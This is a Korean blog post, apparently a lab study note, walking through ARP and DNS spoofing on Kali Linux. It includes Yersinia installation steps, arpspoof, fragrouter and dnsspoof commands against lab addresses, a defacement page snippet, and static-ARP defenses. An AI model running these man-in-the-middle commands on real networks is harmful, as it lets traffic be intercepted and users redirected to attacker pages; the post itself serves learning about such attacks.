Spoofing

:)·2024년 5월 23일
spoofing
0

보안 

목록 보기
10/28

공격

Yersinia - 패킷 중간에 변조시키는 툴

https://www.kali.org/tools/yersinia/
- 설치(yersinia 빠르게 새로 받는법)

    https://http.kali.org/README?mirrorstats   <==== 레포 상태 확인
    vi /etc/apt/source.list
    기존내용 주석
    https://kali.download/kali  를 적용함
    apt-get update
    
    apt remove --auto-remove yersinia
    apt purge  --auto-remove yersinia
    
    git clone https://github.com/tomac/yersinia /opt/yersinia
    apt install autoconf libgtk-3-dev libnet1-dev  libgtk2.0-dev libpcap-dev -y
    
    cd /opt/yersinia
    ./autogen.sh
    
    ./configure --with-gtk
    make
    make install
    
    실행: yersinia -G

SPOOFING

  • 전제조건: ARP spoofing이 걸려있어야 함
  • 스위치를 공격함 - L2 장비는 MAC으로 통신함 = MAC을 조작하면 라우터를 통해 외부로 나가는게 아니라 공격자를 타고간 후에 라우터로 나가게 됨 ⇒ 라우터에 도착하기 전에 이루어지는 공격 ⇒ 이를 막기 위해 NAC을 사용 (NAC은 MAC을 검사함)
  • arp 에는 체크섬이 없음
  • 와이어 샤크를 통해서 확인할 수 있음

1. ARP spoofing

  • 정의: 칼리가 10.10.10.254 게이트웨이 IP주소를 보내면서 자신의 MAC주소로 매칭을 계속 시도함 →ARP가 자동으로 테이블을 만들어 내기 때문에 칼리 공격 의도대로 mac테이블이 바뀌게 됨

    정상 컴퓨터

    내컴퓨터 → GW → internet

    arpspoof일경우

    내컴퓨터 → 공격자 PC → GW → internet

    • 공격 방법
      • 칼리 100.100.100.200 (공격서버)
        서버 100.100.100.10
      • 칼리
        arpspoof -i eth0 -t 100.100.100.10 100.100.100.254& (target이 100.100.100.10 , GW를 적은 이유는 외부로 나가기 위해 반드시 거쳐가는 IP이기에=나가는 경로이기만 하면 됨)

공격 서버(arpspoof 공격 시작)

본서버(mini)

  • apt-get install fragrouter : 포워딩 툴설치
  • fragrouter -B1& : IP 포워딩
    - 공격 서버( 본서버에서 ping 8.8.8.8을 보내는 것 확인 가능)
  • 보안 방법
    - mac-table을 고정으로 잡기 (gateway ..)

arp -s 10.10.10.254 [mac주소]
arp -a 로 확인


삭제: arp -d 10.10.10.254

  • 대부분의 스푸핑은 자동으로 잡히게 되는 내용을 중간에 끼워넣어서 변조 하게 되므로 고정으로 바꿔주는 대책을 활용함

2. DNS spoofing

  • dns는 udp 이기에 가능( tcp는 불가능)
  • 서버 확인 cat /etc/resolv.conf
    168.126.63.1
  • 공격 방법

    arpspoof -i eth0 -t 20.20.20.20 20.20.20.254
    fragrouter -B1 (IP포워딩)

  • 칼리 위조 DNS세팅

  • 네이버의 IP가 공격자가 설정한 IP로 나옴

    - 모든 공격이 100% 성공하지는 않음, 168.126.63.1에서도 찾지 못할 경우, 공격자가 설정해놓은 index.html화면이 뜸

  • 홈페이지 변경
    service apache2 restart
    vi /var/www/html/index.html

  • 웹사용코드

      <meta charset="UTF-8">
  <marquee bgcolor="red">
  <font size=10 color=black>
  공격 성공
  </font></marguee>
    • 최종공격
      dnsspoof -i eth0 -f dns


- 본 서버에서 naver.com에 접속하였으나 공격자가 설정한 100.100.100.200 사이트가 나오는 모습 ⇒ 결과적으론 인터넷 연결(외부로 나가는 것) 실패임

profile
:)
:) GITHUB: https://github.com/YJ2123412
이전 포스트

GATEWAY 이중화

다음 포스트

Switch jamming

0개의 댓글